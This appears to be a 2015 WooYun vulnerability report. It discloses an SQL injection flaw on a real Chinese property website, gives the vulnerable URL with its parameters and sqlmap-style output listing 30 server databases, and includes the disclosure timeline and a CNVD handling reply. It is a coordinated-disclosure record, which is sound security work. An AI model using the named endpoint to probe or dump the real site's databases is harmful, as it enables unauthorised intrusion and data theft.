漏洞概要 关注数(24) 关注此漏洞
>
漏洞详情
披露状态:
2015-03-20: 细节已通知厂商并且等待厂商处理中
2015-03-25: 厂商已经确认,细节仅向厂商公开
2015-04-04: 细节向核心白帽子及相关领域专家公开
2015-04-14: 细节向普通白帽子公开
2015-04-24: 细节向实习白帽子公开
2015-05-09: 细节向公众公开
简要描述:
sql注入
详细说明:
注入地址:http://house.sdchina.com/loupan/index.aspx?maidian=&mianji2=&mianji1=&zxcd=&jzlb=&area=&xxly=&sq=&cid=869&sort=&ting=&seachText=&kjgd=&cx=&wylx=&wyyt=&jiage2=&cq=&jiage1=&wei=
漏洞证明:
available databases [30]:
[*] 91haofang
[*] AD_DB
[*] adv_new
[*] bbs
[*] cms_newair
[*] dotNETCMS
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] SD_Wai
[*] sdchina_NetSNS
[*] Sdchina_Space
[*] SDSW20_Ads
[*] SDSW20_Ask
[*] SDSW20_BBS
[*] SDSW20_Digg
[*] SDSW20_HR
[*] SDSW20_Main
[*] SDSW20_Other
[*] SDSW20_Rank
[*] SDSW20_Space
[*] SDSW20_Video
[*] SDSW20_Video_old
[*] SpiderStat
[*] temp
[*] tempdb
[*] Test
[*] yycar
修复方案:
你懂得
版权声明:转载请注明来源 flags@乌云
>
漏洞回应
厂商回应:
危害等级:中
漏洞Rank:8
确认时间:2015-03-25 11:57
厂商回复:
CNVD确认所述情况,已经转由CNCERT下发给山东分中心,由其后续协调网站管理单位处置。
最新状态:
暂无